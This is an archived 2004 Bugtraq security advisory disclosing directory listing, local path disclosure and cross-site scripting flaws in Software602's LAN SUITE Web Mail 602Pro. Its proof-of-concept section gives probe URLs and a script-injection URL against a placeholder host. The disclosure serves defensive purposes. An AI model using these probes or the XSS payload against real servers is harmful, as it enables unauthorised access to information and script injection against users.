lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 28 Feb 2004 15:12:19 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "bugtraq" <bugtraq@...urityfocus.com>
Cc: "SecurITeam News" <news@...uriteam.com>,
	"securitytracker" <bugs@...uritytracker.com>
Subject: LAN SUITE Web Mail 602Pro Multiple Vulnerabilities


#######################################################################

Application:   LAN SUITE Web Mail
Server:            WEB602/1.04
Vendors:         Software602, Inc
                         http://www.software602.com
Versions:        602Pro
Platforms:       Windows
Bug:                 Directory Listing, Local Path Disclosure and Cross Site
Scripting
Risk:                Medium
Exploitation:   Remote with browser
Date:               28 Feb 2004
Author:            Rafel Ivgi, The-Insider
E-mail:            the_insider@...l.com
Website:         http://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bugs
3) The Code

#######################################################################

===============
1) Introduction
===============

Software602's PC Suite features a highly capable word processor,
spreadsheet, and photo editor/organizer--and it won't cost you a dime if
you're a
home user. (Commercial customers pay $60, and all users must register the
software
within 30 days to unlock all the features.) Can it compete feature for
feature with
Word and Excel? No, but it has the essential tools you use every day.
You can even get help, if you're willing to pay for it: E-mail support costs
$50 for
one year; phone support is $60 per incident.

#######################################################################

======
2) Bug
======
Directory Listing:
-----------------------
Upon refering to index.html directory listing of the folder is printed:
http://<host>/index.html - directory listing
http://<host>/cgi-bin/
http://<host>/users/


Local Path Disclosure:
-------------------------------
Inside the mail login form, the local path of the server's folder is
specified.
http://<host>/mail/
<input type="hidden" name="Mail602Dir" value="C:\LANSUITE">


Cross Site Scripting:
----------------------------
When reffering to index.html as folder, text and script injection is
available.
http://<host>/index.html/<script>alert('XSS')</script>

#######################################################################

===========
3) The Code
===========

Directory Listing:           http://<host>/index.html
Directory Listing:           http://<host>/cgi-bin/
Local Path Disclosure: <input type="hidden" name="Mail602Dir"
value="C:\LANSUITE">
Cross Site Scripting:
http://<host>/index.html/<script>alert('XSS')</script>

#######################################################################

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ